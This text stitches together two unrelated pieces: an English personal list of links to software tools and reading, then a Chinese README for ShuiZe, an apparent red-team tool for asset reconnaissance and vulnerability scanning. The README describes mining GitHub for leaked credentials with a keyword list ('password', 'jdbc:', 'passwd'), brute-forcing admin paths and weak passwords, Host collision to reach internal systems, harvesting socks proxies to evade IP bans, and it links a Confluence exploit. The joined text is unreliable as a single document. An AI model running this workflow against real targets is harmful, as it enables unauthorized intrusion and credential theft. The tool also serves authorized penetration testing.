[https://github.com/yangyuexiong/Flask_BestPractices](https://github.com/yangyuexiong/Flask_BestPractices) * fedy: Fedora post-install tool to install multimedia codecs and additional software that Fedora doesn't want to ship, like H264 support, Adobe Flash (*don't do Flash unless it is absolutely necessary for some materially-important purpose*), Oracle Java etc., and much more with just a few clicks [https://github.com/rpmfusion-infra/fedy](https://github.com/rpmfusion-infra/fedy) * Sometimes you are given data with no description of its layout/nature. Here are two data exploration utilities: * Flenser [https://github.com/JohnMcCambridge/flenser](https://github.com/JohnMcCambridge/flenser) * Lux [https://github.com/lux-org/lux](https://github.com/lux-org/lux) * Begone Ads [Python] [https://github.com/anned20/begoneads/tree/master/begoneads](https://github.com/anned20/begoneads/tree/master/begoneads) * Raspberry Pi: Tutorials, Models, How to Get Started by Avram Piltch, Tom's Hardware [https://www.tomshardware.com/news/raspberry-pi](https://www.tomshardware.com/news/raspberry-pi) * READ: "A Building Code for Building Code -- Putting What We Know Works to Work." By Carl E. Landwehr. [http://www.landwehr.org/2013-12-cl-acsac-essay-bc.pdf](http://www.landwehr.org/2013-12-cl-acsac-essay-bc.pdf) * Tufin [http://www.tufin.com/](http://www.tufin.com/) * Viewfinity [http://www.viewfinity.com/](http://www.viewfinity.com/) * Check Various tools for testing RFC 5077 [https://github.com/vincentbernat/rfc5077](https://github.com/vincentbernat/rfc5077) * Check interactive SNMP tool with Python [https://github.com/vincentbernat/snimpy](https://github.com/vincentbernat/snimpy) * layer 2 network discovery application [https://github.com/vincentbernat/wiremaps](https://github.com/vincentbernat/wiremaps) * What Port Is? [https://github.com/ncrocfer/whatportis](https://github.com/ncrocfer/whatportis) * Java 8 Cheat Sheet: [http://zeroturnaround.com/wp-content/uploads/2015/12/RebelLabs-Java-8-cheat-sheet.png](http://zeroturnaround.com/wp-content/uploads/2015/12/RebelLabs-Java-8-cheat-sheet.png) * Crypto101: an introductory course on cryptography. [https://www.crypto101.io/](https://www.crypto101.io/) * Handy list of browser user-agent strings (long) in PHP code: [https://github.com/smxi/php-browser-detection/blob/master/browser_detection.inc](https://github.com/smxi/php-browser-detection/blob/master/browser_detection.inc) * 7500 user-agent strings from Jerry Gamblin [https://github.com/jgamblin/curluseragent/blob/master/ua.txt](https://github.com/jgamblin/curluseragent/blob/master/ua.txt) * Another list (short) of UA strings, categorized by device types [https://github.com/miketaylr/useragent-switcher-xml/blob/master/useragentswitcher.xml](https://github.com/miketaylr/useragent-switcher-xml/blob/master/useragentswitcher.xml) * Google Fiber Wifi Data Presentation [http://apenwarr.ca/diary/wifi-data-apenwarr-201602.pdf](http://apenwarr.ca/diary/wifi-data-apenwarr-201602.pdf) and related utilities: [https://gfiber.googlesource.com/vendor/google/platform/+/master/spectralanalyzer/](https://gfiber.googlesource.com/vendor/google/platform/+/master/spectralanalyzer/) & [https://github.com/apenwarr/wavedroplet/](https://github.com/apenwarr/wavedroplet/) & blip [https://github.com/apenwarr/blip/](https://github.com/apenwarr/blip/) * blip latency trending utility [https://github.com/apenwarr/blip](https://github.com/apenwarr/blip) hosted at [http://gfblip.appspot.com/](http://gfblip.appspot.com/) and the DNS-aware version [don't have this](don't have this) hosted at [http://6-dot-gfblip.appspot.com)](http://6-dot-gfblip.appspot.com)) * Performance-Bookmarklet helps to analyze the current page through the Resource Timing API, Navigation Timing API and User-Timing - requests by type, domain, load times, marks and more. [https://github.com/micmro/performance-bookmarklet](https://github.com/micmro/performance-bookmarklet) * *mitmproxy* is an interactive, SSL/TLS-capable intercepting proxy with a console interface for HTTP/1, HTTP/2, and WebSockets. A free and open source swiss-army knife for debugging, testing, privacy measurements, and penetration testing. [https://github.com/mitmproxy/mitmproxy](https://github.com/mitmproxy/mitmproxy) * Transparent proxy server [https://github.com/apenwarr/sshuttle](https://github.com/apenwarr/sshuttle) * Packet decoding for the Go language [https://github.com/apenwarr/gopacket](https://github.com/apenwarr/gopacket) and [https://github.com/google/gopacket](https://github.com/google/gopacket) * Very fast C++ importer from csv files to sqlite3 databases [https://github.com/apenwarr/csv2sqlite](https://github.com/apenwarr/csv2sqlite) * A feature-packed Python package and for utilizing SQLite in Python by Plasticity [https://github.com/plasticityai/supersqlite](https://github.com/plasticityai/supersqlite) * An idea for csv-to-json {csv2json.py} [https://github.com/apenwarr/afterquery/blob/master/csv2json.py](https://github.com/apenwarr/afterquery/blob/master/csv2json.py) * Text Tools [https://github.com/fmhy/FMHY/wiki/%F0%9F%94%A7-Tools#-text-tools](https://github.com/fmhy/FMHY/wiki/%F0%9F%94%A7-Tools#-text-tools) and more generally "[tools](https://github.com/fmhy/FMHY/wiki/%F0%9F%94%A7-Tools](https://github.com/fmhy/FMHY/wiki/%F0%9F%94%A7-Tools) * Simple static page development grunt setup [https://github.com/micmro/grunt-simple-boilerplate](https://github.com/micmro/grunt-simple-boilerplate) * WiGPSFi – ESP8266 + GPS [http://euerdesign.de/2016/04/16/wigpsfi-esp8266-gps/](http://euerdesign.de/2016/04/16/wigpsfi-esp8266-gps/) * Creepy Wireless Stalking Made Easy [https://hackaday.com/2016/12/04/creepy-wireless-stalking-made-easy/](https://hackaday.com/2016/12/04/creepy-wireless-stalking-made-easy/) * WarWalking With The ESP8266 [https://hackaday.com/2016/10/23/warwalking-with-the-esp8266/](https://hackaday.com/2016/10/23/warwalking-with-the-esp8266/) * Windows 10 Wi-Fi Analyzer [https://www.microsoft.com/en-us/store/p/wifi-analyzer/9nblggh33n0n](https://www.microsoft.com/en-us/store/p/wifi-analyzer/9nblggh33n0n) * Code Review Questions: * Eric Farkas: [http://ericfarkas.com/posts/questions-i-ask-during-code-review](http://ericfarkas.com/posts/questions-i-ask-during-code-review) * thoughbot's Code Review guide [https://github.com/thoughtbot/guides/blob/main/code-review/README.md](https://github.com/thoughtbot/guides/blob/main/code-review/README.md) * Examples from StackExchange [https://security.stackexchange.com/questions/tagged/code-review](https://security.stackexchange.com/questions/tagged/code-review) * Another [https://productcoalition.com/code-review-questions-what-should-you-be-looking-for-e3f9c147baff](https://productcoalition.com/code-review-questions-what-should-you-be-looking-for-e3f9c147baff) * How to give a code review [https://medium.com/better-programming/how-to-give-a-great-code-review-7e32e5ba0771](https://medium.com/better-programming/how-to-give-a-great-code-review-7e32e5ba0771) * How to do code review (.NET) [https://sites.google.com/site/wcfpandu/how-to-review-code](https://sites.google.com/site/wcfpandu/how-to-review-code) ### Other * Learn more about what your github repos can do for you: [https://github.com/joelparkerhenderson/github-special-files-and-paths](https://github.com/joelparkerhenderson/github-special-files-and-paths) * Where are the power outages? [https://poweroutage.com/](https://poweroutage.com/) * Fear & Greed Index [https://money.cnn.com/data/fear-and-greed/](https://money.cnn.com/data/fear-and-greed/) * The **best** command line stock price grabber for a quick sanity check! Thank you Patrick Stadler. [https://github.com/pstadler/ticker.sh](https://github.com/pstadler/ticker.sh) * And another great-looking command line stock price grabber: ```curl https://terminal-stocks.herokuapp.com/<SYMBOL>```. Thank you Shashi Prakash Gautam for your excellent server. [https://github.com/shweshi/terminal-stocks](https://github.com/shweshi/terminal-stocks) * If you want to just grab a long history for any given security (*through 2018-03-27*), try [https://www.quandl.com/api/v3/datasets/WIKI/<symbol>](https://www.quandl.com/api/v3/datasets/WIKI/<symbol>) * Database of False or Misleading Claims By DJ Trump During his 4-Year Presidency (*more than 30,000 of them*) [https://www.washingtonpost.com/graphics/politics/trump-claims-database/](https://www.washingtonpost.com/graphics/politics/trump-claims-database/) * Look into this simple mass Search & Replace tool (Rust): [https://github.com/nvie/sr](https://github.com/nvie/sr) * Who pays for writing? Here is an annotated list of organizations that pay writers: [https://github.com/malgamves/CommunityWriterPrograms](https://github.com/malgamves/CommunityWriterPrograms) * China Brief [https://jamestown.org/programs/cb/](https://jamestown.org/programs/cb/) * For some background on the expanding criminal industry of ransomware where criminal syndicates have evolved a "conveyor-belt-like process of hacking, encrypting and then negotiating for ransom in cryptocurrencies:" [https://www.nytimes.com/2021/12/06/world/europe/ransomware-russia-bitcoin.html](https://www.nytimes.com/2021/12/06/world/europe/ransomware-russia-bitcoin.html) * For a primer on the sprawling People’s Liberation Army (PLA) Strategic Support Force that "centralizes information warfare capabilities in the cyber and space domains" from the U.S. [Congressional Research Service](https://crsreports.congress.gov) see: [China Primer: The People’s Liberation Army (PLA) (Updated December 21, 2022)](https://crsreports.congress.gov/product/pdf/IF/IF11719) * Online SVG Editor, SVGBob [https://ivanceras.github.io/svgbob-editor/](https://ivanceras.github.io/svgbob-editor/) * SVG Python module [https://github.com/orsinium-labs/svg.py](https://github.com/orsinium-labs/svg.py) * svgcleaner (*Rust*) is used to losslessly reduce the size of an SVG image -- generally created in a vector editing application -- before publishing [https://github.com/RazrFalcon/svgcleaner](https://github.com/RazrFalcon/svgcleaner). See also: * SVGO (*Python*) [https://github.com/svg/svgo](https://github.com/svg/svgo) * Scour (*JavaScript/TypeScript*) [https://github.com/scour-project/scour](https://github.com/scour-project/scour) * MuseScore [https://github.com/musescore/MuseScore](https://github.com/musescore/MuseScore) and [https://musescore.org/en/guitar](https://musescore.org/en/guitar) * Chordious [https://github.com/jonthysell/Chordious](https://github.com/jonthysell/Chordious) with related [https://github.com/svg-net/SVG](https://github.com/svg-net/SVG) * DoD Cyber Workforce Framework - interesting way to describe roles [https://public.cyber.mil/cw/dcwf/](https://public.cyber.mil/cw/dcwf/) * Before donating to non-profits, do your research [https://www.open990.org/org/](https://www.open990.org/org/) * Satellite view of my weather [http://re.ssec.wisc.edu/](http://re.ssec.wisc.edu/) * High-resolution imagery via Earth Engine [https://explorer.earthengine.google.com/#workspace](https://explorer.earthengine.google.com/#workspace) * Remittances sent from United States to other countries in USD [https://remittancesbycountry.site/country/united_states](https://remittancesbycountry.site/country/united_states) * Getting communications right is hard. Language is a foundational component. WordNet sometimes helps. [https://en-word.net/](https://en-word.net/) and [https://github.com/globalwordnet/english-wordnet](https://github.com/globalwordnet/english-wordnet) * Sometimes historical context matters when choosing a given term. Merriam-Webster hosts a neat tool that identifies when given words were first used. Look up any year to find out. From Merriam-Webster, [https://www.merriam-webster.com/dictionary/ad%20hominem](https://www.merriam-webster.com/dictionary/ad%20hominem). Accessed 24 Oct. 2022 * Webster's 1913 Unabridged Dictionary at Project Gutenberg [https://www.gutenberg.org/ebooks/29765](https://www.gutenberg.org/ebooks/29765) * International Building Code, 2012, Second Printing. [https://codes.iccsafe.org/content/IBC2012P12/chapter-1-scope-and-administration](https://codes.iccsafe.org/content/IBC2012P12/chapter-1-scope-and-administration) * ISO Country List [https://www.iso.org/obp/ui/#search](https://www.iso.org/obp/ui/#search) * Script that extracts character names from a text file and performs analysis of text sentences containing the names. [https://github.com/emdaniels/character-extraction](https://github.com/emdaniels/character-extraction) * The definitive list of lists (of lists) curated on GitHub [https://github.com/jnv/lists](https://github.com/jnv/lists) * Mobile App Pentesting Cheetsheet [https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet/blob/master/README.md](https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet/blob/master/README.md) * Free Programming Books [https://github.com/vhf/free-programming-books/blob/master/free-programming-books.md](https://github.com/vhf/free-programming-books/blob/master/free-programming-books.md) * More Free Programming Books [https://github.com/EbookFoundation/free-programming-books/blob/master/free-programming-books.md](https://github.com/EbookFoundation/free-programming-books/blob/master/free-programming-books.md) * Tool by Tool, Skill by Skill. By Simon St.Laurent [http://chimera.labs.oreilly.com/books/1234000000882/index.html](http://chimera.labs.oreilly.com/books/1234000000882/index.html) Especially Appendix B. Sharpening and Maintenance Basics. [http://chimera.labs.oreilly.com/books/1234000000882/apb.html](http://chimera.labs.oreilly.com/books/1234000000882/apb.html) * Awesome Selfhosted. This is a list of Free Software network services and web applications which can be hosted locally. [https://github.com/awesome-selfhosted/awesome-selfhosted](https://github.com/awesome-selfhosted/awesome-selfhosted) * Awesome SysAdmin. A list of open source sysadmin resources. [https://github.com/kahun/awesome-sysadmin](https://github.com/kahun/awesome-sysadmin) * Awesome Data Science. A repository of resources to learn and apply for real world problems. [https://github.com/okulbilisim/awesome-datascience](https://github.com/okulbilisim/awesome-datascience) * And data from OurWorldInData for your experiments: [https://github.com/owid/owid-datasets/tree/master/datasets](https://github.com/owid/owid-datasets/tree/master/datasets) * Awesome R [https://github.com/qinwf/awesome-R](https://github.com/qinwf/awesome-R) and [https://awesome-r.com/](https://awesome-r.com/) * Managing risk in the context of a long time-horizon. * See the "Global Risks 2014 - Ninth Edition" Insight Report from the World Economic Forum. [http://www3.weforum.org/docs/WEF_GlobalRisks_Report_2014.pdf](http://www3.weforum.org/docs/WEF_GlobalRisks_Report_2014.pdf) Especially part 2, pages 38-49. It is a short read on risks associated with -- among other topics -- the way the Internet is evolving, risks associated with "trust," and "managing risk" in the context of a long time-horizon. * Also: "Global Risks 2015 - Tenth Edition" [http://www3.weforum.org/docs/WEF_Global_Risks_2015_Report15.pdf](http://www3.weforum.org/docs/WEF_Global_Risks_2015_Report15.pdf) * And more recently: "Global Risks 2016 - Eleventh Edition" [http://www3.weforum.org/docs/GRR/WEF_GRR16.pdf](http://www3.weforum.org/docs/GRR/WEF_GRR16.pdf) * And 2017: "Global Risks 2017 -- 12th Edition" [http://www3.weforum.org/docs/GRR17_Report_web.pdf](http://www3.weforum.org/docs/GRR17_Report_web.pdf) * And 2018: "The Global Risks Report 2018 - 13th Edition" [http://www3.weforum.org/docs/WEF_GRR18_Report.pdf](http://www3.weforum.org/docs/WEF_GRR18_Report.pdf) * And 2019: "The Global Risks Report 2019 - 14th Edition" [http://www3.weforum.org/docs/WEF_Global_Risks_Report_2019.pdf](http://www3.weforum.org/docs/WEF_Global_Risks_Report_2019.pdf) * And 2020: "The Global Risks Report 2020 - 20th Edition"[http://www3.weforum.org/docs/WEF_Global_Risk_Report_2020.pdf](http://www3.weforum.org/docs/WEF_Global_Risk_Report_2020.pdf) or [https://reports.weforum.org/global-risks-report-2020/](https://reports.weforum.org/global-risks-report-2020/) * And most recently: "The Global Risks Report 2021 - 16th Edition" [http://www3.weforum.org/docs/WEF_The_Global_Risks_Report_2021.pdf](http://www3.weforum.org/docs/WEF_The_Global_Risks_Report_2021.pdf) * A definitive list of tools for generating static websites [https://github.com/pinceladasdaweb/Static-Site-Generators](https://github.com/pinceladasdaweb/Static-Site-Generators) * The definitive list of newsletters to keep up to date on various web development technologies [https://github.com/pinceladasdaweb/Upgrade-your-brain](https://github.com/pinceladasdaweb/Upgrade-your-brain) * hack-font for your development environment [https://www.npmjs.com/package/hack-font](https://www.npmjs.com/package/hack-font) * Big list of HTTP media types [https://www.iana.org/assignments/media-types/media-types.xhtml ](https://www.iana.org/assignments/media-types/media-types.xhtml ) * Open source, free textbooks: [https://ocw.mit.edu/courses/online-textbooks/](https://ocw.mit.edu/courses/online-textbooks/) and [https://openstax.org/](https://openstax.org/) * WhitePages: [https://www.therealyellowpages.com/Des-Moines-Regional-IA-2021/1/](https://www.therealyellowpages.com/Des-Moines-Regional-IA-2021/1/) * and something completely different [https://ir.uiowa.edu/annals-of-iowa/](https://ir.uiowa.edu/annals-of-iowa/) * The *real* cost of a car [https://www.carboncounter.com/#!/explore](https://www.carboncounter.com/#!/explore) * My favorite essay on bitcoin [https://www.nytimes.com/2021/06/14/opinion/bitcoin-cryptocurrency-flaws.html](https://www.nytimes.com/2021/06/14/opinion/bitcoin-cryptocurrency-flaws.html) * Architecture Patterns with Python, Enabling Test-Driven Development, Domain-Driven Design, and Event-Driven Microservices. (A Book about Pythonic Application Architecture Patterns for Managing Complexity.) By Harry Percival, Bob Gregory [https://github.com/cosmicpython/book](https://github.com/cosmicpython/book) and [http://shop.oreilly.com/product/0636920254638.do](http://shop.oreilly.com/product/0636920254638.do) * An excellent first lesson on "Dockerizing FastAPI with Postgres, Uvicorn, and Traefik (and LetsEncript)" By Amal Shaji, 2021-05-04. [https://testdriven.io/blog/fastapi-docker-traefik/](https://testdriven.io/blog/fastapi-docker-traefik/) ### Projects associated with Novel Corona Virus - COVID-19** See: [https://github.com/mccright/rand-notes/blob/master/Novel-Corona-Virus-COVID-19.md](https://github.com/mccright/rand-notes/blob/master/Novel-Corona-Virus-COVID-19.md) ### WIKI-like platforms for easy sharing (*On your private, safe network*)** * cowyo is a self-contained wiki server that makes jotting notes - simple, easy and fast, but crude and it feels a little unfinished [https://github.com/schollz/cowyo](https://github.com/schollz/cowyo) * Linx is a more full featured *pastbin-like* platform [https://github.com/ZizzyDizzyMC/linx-server/](https://github.com/ZizzyDizzyMC/linx-server/) ### Broadly Reusable Advice * The world is brimming with uncertainties. If you don't have a [will](https://www.freewill.com/glossary#will), create one (*do it now -- you can always morph it later as needed*). Under many circumstances you can start here for free: [https://www.freewill.com/](https://www.freewill.com/) (*there are other systems that will help you prepare a basic will for free*) * "One reason people insist that you use the proper channels to change things is because they have control of the proper channels and they're confident it won't work." [https://twitter.com/joncstone/status/1269961630940631041](https://twitter.com/joncstone/status/1269961630940631041) * On Being Fired [https://third-bit.com/rules/#being-fired](https://third-bit.com/rules/#being-fired) * Ten quick tips for delivering programming lessons [https://journals.plos.org/ploscompbiol/article?id=10.1371/journal.pcbi.1007433](https://journals.plos.org/ploscompbiol/article?id=10.1371/journal.pcbi.1007433) * Ten quick tips for teaching programming [https://journals.plos.org/ploscompbiol/article?id=10.1371/journal.pcbi.1006023](https://journals.plos.org/ploscompbiol/article?id=10.1371/journal.pcbi.1006023) * Jesse Duffield's "*Stuff I would tell my younger self*" [https://github.com/jesseduffield/wisdom/wiki](https://github.com/jesseduffield/wisdom/wiki) * A [Thesaurus of Job Titles](http://www.enlightenjobs.com/) to help "Improve the information flowing between recruiters and job seekers. Improve how recruiters and job seekers create job postings and resumes/online profiles. Improve how recruiters and job seekers search for candidates and jobs" [https://github.com/johnpcarty/Thesaurus-of-Job-Titles](https://github.com/johnpcarty/Thesaurus-of-Job-Titles) * Ten simple rules for making research software more robust [https://journals.plos.org/ploscompbiol/article?id=10.1371/journal.pcbi.1005412](https://journals.plos.org/ploscompbiol/article?id=10.1371/journal.pcbi.1005412) * You have the right to film police. Here's how to do it effectively — and safely [https://www.washingtonpost.com/technology/2021/04/22/how-to-film-police-smartphone/](https://www.washingtonpost.com/technology/2021/04/22/how-to-film-police-smartphone/) and why it is important to do so [https://www.washingtonpost.com/business/technology/a-cop-fires-a-teen-dies-yet-six-police-body-cameras-somehow-miss-what-happens](https://www.washingtonpost.com/business/technology/a-cop-fires-a-teen-dies-yet-six-police-body-cameras-somehow-miss-what-happens/2017/03/20/c7d801a8-0824-11e7-b77c-0047d15a24e0_story.html) * "Companies are hoarding personal data about you. Here's how to get them to delete it." [https://www.washingtonpost.com/technology/2021/09/26/ask-company-delete-personal-data/](https://www.washingtonpost.com/technology/2021/09/26/ask-company-delete-personal-data/) * "The three fundamental Rules of Robotics" >**One**, a robot may not injure a human being, or, through inaction, allow a human being to come to harm. **Two**, a robot must obey the orders given it by human beings except where such orders would conflict with the First Law. **Three**, a robot must protect its own existence as long as such protection does not conflict with the First or Second Laws. [Isaac Asimov introduced these in his 1942 short story "Runaround" (*included in the 1950 collection I, Robot*) [https://en.wikipedia.org/wiki/Three_Laws_of_Robotics](https://en.wikipedia.org/wiki/Three_Laws_of_Robotics)]
# 水泽-信息收集自动化工具 [![GitHub release](https://img.shields.io/github/release/0x727/ShuiZe_0x727.svg)](https://github.com/0x727/ShuiZe_0x727/releases) 郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。 ## 0x01 介绍 作者:[Ske](https://github.com/SkewwG) 团队:[0x727](https://github.com/0x727),未来一段时间将陆续开源工具,地址:https://github.com/0x727 定位:协助红队人员快速的信息收集,测绘目标资产,寻找薄弱点 语言:python3开发 功能:一条龙服务,只需要输入根域名即可全方位收集相关资产,并检测漏洞。也可以输入多个域名、C段IP等,具体案例见下文。 调用:脚本借用了ksubdomain爆破子域名和theHarvester收集邮箱,感谢ksubdomain和theHarvester作者 ## 0x02 安装 为了避免踩坑,建议安装在如下环境中 * 当前用户对该目录有写权限,不然扫描结果无法生成。root权限即可 * Python环境必须是3.7以上,因为使用了异步。建议VPS环境是ubuntu20,默认是python3.8。安装模块的时候切记不要走豆瓣的源 * 在配置文件iniFile/config.ini里加入api(fofa、shodan、github、virustotal) ``` chmod 777 build.sh ./build.sh ``` ![image-20210728153419131](imgs/image-20210728153419131.png) `python3 ShuiZe.py -h` ![image-20210728154929084](imgs/image-20210728154929084.png) ### docker运行ShuiZe 较多人反馈安装的时候会出现各种报错,新增通过docker运行ShuiZe 通过下面的命令安装docker,然后拉取python3.8的容器,再git clone水泽后,运行docker_build.sh即可。 ``` apt install docker.io docker pull yankovg/python3.8.2-ubuntu18.04 docker run -itd yankovg/python3.8.2-ubuntu18.04 bash docker exec -it docker的ID /bin/bash apt-get update apt install git --fix-missing apt install vim rm /usr/bin/python3 ln -s /usr/local/bin/python3.8 /usr/bin/python3 python3 -m pip install --upgrade pip git clone https://github.com/0x727/ShuiZe_0x727.git chmod 777 docker_build.sh ./docker_build.sh ``` 也可参考 [@1itt1eB0y](https://github.com/1itt1eB0y) 提供的Dockerfile和docker-compose.yml构建镜像并运行 链接:https://github.com/1itt1eB0y/MyCollection/tree/master/docker/shuize **请自行评估安全性** **脚本自带Linux版本的Nuclei和ksubdomain,如果是windows或者mac,需要自行更换版本。** ## 0x03 效果展示 备案反查顶级域名 ![image-20210728155358378](imgs/image-20210728155358378.png) 不是泛解析,调用ksubdomain爆破子域名 ![image-20210728155541501](imgs/image-20210728155541501-7458943.png) theHarvest获取邮箱 ![image-20210728161507035](imgs/image-20210728161507035.png) ![image-20210728163216047](imgs/image-20210728163216047.png) 第三方数据接口 -> 获取子域名 ![image-20210728160705706](imgs/image-20210728160705706.png) github -> 从github获取子域名,并把查询结果保存到txt,并匹配关键字获取敏感信息 ![image-20210728161022348](imgs/image-20210728161022348.png) 百度和必应爬虫 ![image-20210728161117459](imgs/image-20210728161117459.png) 证书 ![image-20210728161711534](imgs/image-20210728161711534.png) 子域名友链 ![image-20210728161339208](imgs/image-20210728161339208.png) 解析子域名A记录,检测是否CDN和整理C段的IP ![image-20210728162655684](imgs/image-20210728162655684.png) ![image-20210728162049962](imgs/image-20210728162049962.png) 网络空间搜索引擎:Fofa和Shodan ![image-20210728162119531](imgs/image-20210728162119531.png) IP反查域名 ![image-20210728162303312](imgs/image-20210728162303312.png) 存活探测 ![image-20210728162441132](imgs/image-20210728162441132.png) 漏洞检测 ![image-20210728165612314](imgs/image-20210728165612314.png) 扫描结果保存在excel文件里 ![image-20210728170303756](imgs/image-20210728170303756.png) excel的内容如下 备案反查顶级域名 ![image-20210728163926763](imgs/image-20210728163926763.png) ![image-20210728163940918](imgs/image-20210728163940918.png) 邮箱 ![image-20210728164010063](imgs/image-20210728164010063.png) Github敏感信息 ![image-20210728164040649](imgs/image-20210728164040649.png) 爬虫 ![image-20210728164146630](imgs/image-20210728164146630.png) 证书 ![image-20210728164211552](imgs/image-20210728164211552.png) 子域名A记录和CDN ![image-20210728164316747](imgs/image-20210728164316747.png) 动态链接和后台地址 ![image-20210728164555141](imgs/image-20210728164555141.png) 网络空间搜索引擎 ![image-20210728164745820](imgs/image-20210728164745820.png) ip反查域名 ![image-20210728164811422](imgs/image-20210728164811422.png) 存活网站标题 ![image-20210728164933353](imgs/image-20210728164933353.png) 指纹和漏洞 ![image-20210728165004202](imgs/image-20210728165004202.png) 相关域名和C段 ![image-20210728165052361](imgs/image-20210728165052361.png) ## 0x04 POC编写 POC的模板文件例子:`Plugins/Vul/Web/__template__.py` 只需要在run_detect方法里调用POC的利用方法即可。 ## 0x05 使用方法 | 语法 | 功能 | | :------------------------------------------------------- | :-------------------------------------------- | | python3 ShuiZe.py -d domain.com | 收集单一的根域名资产 | | python3 ShuiZe.py --domainFile domain.txt | 批量跑根域名列表 | | python3 ShuiZe.py -c 192.168.1.0,192.168.2.0,192.168.3.0 | 收集C段资产 | | python3 ShuiZe.py -f url.txt | 对url里的网站漏洞检测 | | python3 ShuiZe.py --fofaTitle XXX大学 | 从fofa里收集标题为XXX大学的资产,然后漏洞检测 | | python3 ShuiZe.py -d domain.com --justInfoGather 1 | 仅信息收集,不检测漏洞 | | python3 ShuiZe.py -d domain.com --ksubdomain 0 | 不调用ksubdomain爆破子域名 | ## 0x06 实现原理 * 备案反查顶级域名 -> 获取目标域名相关的其他根域名 -> 接口:http://icp.chinaz.com * 判断是否是泛解析 * 泛解析-> 不爆破子域名 * 不是泛解析 -> 调用ksubdomain爆破子域名(脚本里我用的是linux版本的ksubdomain,文件地址:./Plugins/infoGather/subdomain/ksubdomain/ksubdomain_linux,如果是其他系统请自行替换) * 调用theHarvester -> 获取子域名和邮箱列表 * 第三方数据接口 -> 获取子域名 * virustotal -> https://www.virustotal.com -> 需要api * ce.baidu.com -> http://ce.baidu.com * url.fht.im -> https://url.fht.im/ * qianxun -> https://www.dnsscan.cn/ * sublist3r -> https://api.sublist3r.com * crt.sh -> https://crt.sh * certspotter -> https://api.certspotter.com * bufferover -> http://dns.bufferover.run * threatcrowd -> https://threatcrowd.org * hackertarget -> https://api.hackertarget.com * chaziyu -> https://chaziyu.com/hbu.cn/ * rapiddns -> https://rapiddns.io * sitedossier -> http://www.sitedossier.com * ximcx -> http://sbd.ximcx.cn * github -> 从github获取子域名,并把查询结果保存到txt-获取敏感信息 * 敏感信息关键字匹配,可在iniFile/config.ini自定义关键字内容,内置如下关键字('jdbc:', 'password', 'username', 'database', 'smtp', 'vpn', 'pwd', 'passwd', 'connect') * 百度和必应爬虫 -> 获取目标后台等地址('inurl:admin', 'inurl:login', 'inurl:system', 'inurl:register', 'inurl:upload', '后台', '系统', '登录') * 证书 -> 获取目标关联域名 * 子域名友链 -> 获取未爆破出的子域名,未被收录的深层域名 ![image-20210728132752381](imgs/image-20210728132752381.png) 整理上面所有的子域名 * 对所有子域名判断是否是CDN并解析出A记录 * 统计每个c段出现IP的个数 * 调用网络空间搜索引擎 * fofa -> 需要API * shodan -> 需要API * 前面获得的ip反查域名得到相关资产的子域名,整理出所有的子域名和IP ![image-20210728133047590](imgs/image-20210728133047590.png) * 整理所有资产探测漏洞 * Web -> 存活探测 * 获取标题 * 自动跑后台路径(['admin', 'login', 'system', 'manager', 'admin.jsp', 'login.jsp', 'admin.php', 'login.php','admin.aspx', 'login.aspx', 'admin.asp', 'login.asp']) * 如果URL是IP则查询IP的归属地 * 漏洞检测 -> Plugins/Vul/Web ![image-20210728134051049](imgs/image-20210728134051049.png) ![image-20210728134115608](imgs/image-20210728134115608.png) ![image-20210728134131076](imgs/image-20210728134131076.png) * 非Web服务 --> 未授权和弱口令 ![image-20210728134212279](imgs/image-20210728134212279.png) 其他功能 ![image-20210728134304533](imgs/image-20210728134304533.png) 结果展示: ![image-20210728132105833](imgs/image-20210728132105833.png) 完整流程图: ![](imgs/xmind.png) ## 0x07 新增功能 2021.7.31 增加了Censys接口,需要在iniFile/config.ini的[censys api]中填入API。 功能是获取域名的所有解析IP记录,一是为了Host碰撞,二是更加准确的得到C段IP 需要censys的api,免费的账户一个月只有250次查询,所以后期需要注意,用完了要更新api 2021.7.31 增加了Host碰撞访问内网系统漏洞,感谢 **横戈安全团队-小洲** 提交的建议 ![](imgs/hostCollide.png) 2021.8.1 修复了CDN判断的bug,感谢 **leveryd 师傅** 提交的bug。 issues地址:https://github.com/0x727/ShuiZe_0x727/issues/3 2021.8.3 修复了chinazApi接口请求超时太长的bug,设置默认时间10秒,感谢 **k0njac 师傅**提交的bug。 issues地址:https://github.com/0x727/ShuiZe_0x727/issues/11 2021.8.13 增加了获取Github敏感信息地址的作者邮箱,帮助判断是否是目标员工的项目 2021.8.17 更新了ksubdomain版本,自动选择网卡,不需要重新手动输入网卡 ksubdomain项目地址:https://github.com/knownsec/ksubdomain ![](./imgs/github_auther.png) 2021.9.1 增加了从fofa中爬去socks代理功能,后续可以手动配合proxychains进行漏洞探测,防止因为被封IP导致漏报。 感谢 **安恒水滴实验室-1amfine2333师傅** 提供的思路。 ![](./imgs/socksProxy.png) 2021.9.2 增加了Confluence指纹识别,漏洞利用地址:https://github.com/h3v0x/CVE-2021-26084_Confluence 2021.9.4 增加了某查接口,对目标的整个架构分析,涵盖【对外投资、控股公司、分支机构、联系方式、邮箱】等信息。 感谢 **pykiller师傅** 提交的建议,同时参考了 **吐司师傅gubeiya** 的脚本 issues地址:https://github.com/0x727/ShuiZe_0x727/issues/25 ![](./imgs/aiqicha.png) 2021.9.26 增加了夸克的api接口,-d -c --fofaTitle中都会调用 限定了每次最大查询数量1000条,不然一个月5w条数据也用不了多少次 在config.ini配置文件的quake_nums值 issues地址:https://github.com/0x727/ShuiZe_0x727/issues/33 ![](./imgs/quakeApi.png) ![](./imgs/quakeApi2.png) 2021.11.30 增加了奇安信hunter的api接口,-d -c --fofaTitle中都会调用 限定了每次最大查询数量200条,不然一天的几千条数据也用不了多少次 在config.ini配置文件的qianxin_nums值 issues地址:https://github.com/0x727/ShuiZe_0x727/issues/48 ![](./imgs/qianxinApi2.png) ![](./imgs/qianxinApi.png) 2022.1.17 修复了certspotter接口获取子域名过滤不严谨的问题 感谢 **union-cmd师傅** 提交的建议 issues地址:https://github.com/0x727/ShuiZe_0x727/issues/57 2022.3.21 更新了fofa api的域名 2022.3.21 更新了域名备案反查的问题 2022.3.23 增加了securitytrails接口获取子域名,该接口很强大,建议在config.ini里添加你的api keys issues地址:https://github.com/0x727/ShuiZe_0x727/issues/48 注册地址: https://docs.securitytrails.com/ ![](./imgs/securitytrails.png) 感谢 **郭师傅** 提交的建议 2022.3.23 修复了爱企查无法获取数据的问题 感谢 **横戈安全团队-chhyx(逗逗)** 的技术支持 2022.4.13 修复了奇安信测绘语法使用错误的问题 